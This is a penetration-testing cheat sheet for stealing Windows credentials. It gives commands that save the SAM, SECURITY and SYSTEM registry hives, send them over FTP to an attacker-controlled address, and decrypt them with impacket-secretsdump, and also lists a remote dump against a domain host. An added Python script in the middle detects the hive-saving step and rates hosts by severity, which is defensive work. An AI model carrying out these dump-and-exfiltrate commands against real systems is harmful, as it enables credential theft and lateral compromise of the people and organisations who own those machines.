Dumping Clear Text Credentials
1.0 Registry Hive local
HKEY_LOCAL_MACHINE\Security\Policy\Secrets
NOTE: The user needs read permissions for the registry key.
reg save hklm\sam c:\temp\sam.save
reg save hklm\security c:\temp\security.save
reg save hklm\system c:\temp\system.save
Start an FTP server on the attacking machine
Python FTP server (pyftpdlib):
python3 -m pyftpdlib -w --user=haxx --password=0xdeadbeef
Transfer the files to the attacking machine
open 10.100.13.58 2121
user:
pass:
lcd c:\users\user
send sam.save
send security.save
send system.save
quit
Read cached credentials with impacket
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
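Detection-side view of the `reg save` step above, as an added example that is not part of the original notes: it scans process-creation command lines for `reg save`/`reg export` of the SAM, SECURITY and SYSTEM hive roots and rates each host by which combination was written out. The host names, sample events and the high/medium severity rule are constructed assumptions for illustration.

```python
import re
from collections import defaultdict

# Constructed (host, command line) pairs in the shape of process-creation
# records (Security 4688 / Sysmon Event ID 1). Not taken from real logs.
SAMPLE_EVENTS = [
    ("WS01", r"reg save hklm\sam c:\temp\sam.save"),
    ("WS01", r"reg save hklm\security c:\temp\security.save"),
    ("WS01", r"reg save hklm\system c:\temp\system.save"),
    ("WS02", r'"C:\Windows\System32\reg.exe" SAVE "HKEY_LOCAL_MACHINE\SAM" d:\s.bin /y'),
    ("WS03", r"reg query hklm\system\CurrentControlSet\Services"),
    ("WS03", r"reg save hkcu\software c:\backup\sw.hiv"),
    ("WS04", r"reg.exe export HKLM\SYSTEM\Select c:\x.reg"),
]

HIVE_DUMP = re.compile(r'''
    (?:^|[\\/\s"])reg(?:\.exe)?"?\s+     # reg, reg.exe, or a quoted full path
    (?:save|export)\s+
    "?(?:hklm|hkey_local_machine)\\
    (sam|security|system)                # hive name
    "?(?=\s|$)                           # the hive root itself, not a subkey
''', re.IGNORECASE | re.VERBOSE)


def find_hive_dumps(events):
    """Return {host: set of HKLM hive names written out with reg save/export}."""
    hits = defaultdict(set)
    for host, cmdline in events:
        match = HIVE_DUMP.search(cmdline)
        if match:
            hits[host].add(match.group(1).lower())
    return dict(hits)


def triage(hits):
    """Heuristic severity: SAM and SECURITY are only decryptable offline with
    the boot key from SYSTEM, so SYSTEM plus either of them rates 'high'."""
    return {
        host: "high" if "system" in hives and hives & {"sam", "security"} else "medium"
        for host, hives in hits.items()
    }


if __name__ == "__main__":
    found = find_hive_dumps(SAMPLE_EVENTS)
    for host, severity in sorted(triage(found).items()):
        print(host, severity, sorted(found[host]))
```

Ordinary `reg query` calls, saves of other hives and exports of subkeys such as `HKLM\SYSTEM\Select` do not match, which keeps the rule narrow enough to alert on.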
2.0 Registry Hive remote
NOTE (admin permissions): You need administrative privileges to extract the credentials.
Metasploit
See Metasploit Cheat Sheet, section impacket-secretsdump
impacket
impacket-secretsdump domain/privUser@192.168.2.1